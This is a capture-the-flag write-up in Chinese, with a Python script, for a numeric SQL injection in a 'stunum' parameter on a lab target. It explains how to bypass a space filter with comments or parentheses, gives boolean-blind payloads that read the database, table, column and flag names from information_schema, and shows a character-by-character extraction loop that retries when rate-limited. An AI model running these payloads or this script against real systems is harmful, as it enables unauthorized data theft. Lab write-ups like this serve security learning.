1. 测试输入时发现 `stunum` 参数存在数字型 SQL 注入。
输入 `1 and 1` 时页面报错；又尝试了几个字符，确定是空格被过滤了。
用 `/**/` 代替空格，`1/**/and/**/1` 这样构造的 payload 可以正常执行。页面只会区分条件真/假，不直接回显查询结果，所以这里要用布尔盲注，逐字符比较 ASCII 码。
后面的思路就比较常规了：先逐字符爆破库名，再爆破表名、列名，最后取出字段值。
写了个脚本简单跑了一下，每个阶段换用对应的 payload 即可（注意目标站点有请求频率限制，返回 429 时要等待后重试，否则那一位字符会被漏掉）。
import requests
import time
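url1 = "http://5bd21334-0399-4bb8-93b0-49b562b0a1f0.node5.buuoj.cn:81/?stunum="

# Response substring that tells us the injected condition was true: every
# probe evaluates to 1 (true) or 0 (false), and stunum=1 yields this text.
TRUE_MARKER = "Hi admin, your score is: 100"

# Boolean-blind probes, one per extraction stage. The target filters spaces
# (see the notes above), so the expressions avoid whitespace entirely by
# wrapping every operand in parentheses. Each is formatted with
# (position, ascii_value) and is true when the character at `position`
# (1-based, as substr() counts) equals chr(ascii_value).
payload1 = 'if(ascii(substr(database(),{},1))={},1,0)'  # database name
payload2 = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)="ctf"),{},1))={},1,0)'  # table names in schema ctf
payload3 = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)="flag"),{},1))={},1,0)'  # column names of table flag
payload4 = 'if(ascii(substr((select(value)from(flag)),{},1))={},1,0)'  # value column of table flag
# NOTE: a '>' comparison instead of '=' would allow a binary search over the
# ASCII range (about 7 requests per character instead of up to 97), which
# matters under the target's rate limiting; kept linear here for simplicity.


def oracle(base_url, payload, timeout=10, retries=5):
    """Send one probe and report whether the injected condition held.

    Returns True when TRUE_MARKER appears in the response body.
    HTTP 429 means the target is rate-limiting us: pause and retry the same
    probe instead of discarding it (the original script slept but then threw
    the 429 response away, silently losing the character being tested).
    Raises RuntimeError once `retries` consecutive 429s have been seen.
    """
    for _ in range(retries):
        r = requests.get(url=base_url + payload, timeout=timeout)
        if r.status_code == 429:
            print("too fast")
            time.sleep(1)
            continue
        return TRUE_MARKER in r.text
    raise RuntimeError("rate-limited %d times in a row, giving up" % retries)


def extract(base_url, probe, max_len=400, charset=range(31, 128), ask=oracle):
    """Recover a string one character at a time through a boolean oracle.

    `probe` is a format string taking (position, ascii_value); `ask(base_url,
    payload)` must return True when the probe holds. The inner scan stops at
    the first matching candidate, and the outer loop stops at the first
    position where nothing matches (the end of the string) instead of
    probing all `max_len` positions. Returns the recovered string; the
    partial result is printed after every character so progress survives
    an interruption.
    """
    data = ""
    for i in range(1, max_len + 1):
        for j in charset:
            if ask(base_url, probe.format(i, j)):
                data += chr(j)
                print(data)
                break
        else:
            break  # no candidate matched at position i: end of string
    return data


if __name__ == "__main__":
    # Swap payload1..payload4 here for the respective stage.
    data = extract(url1, payload4)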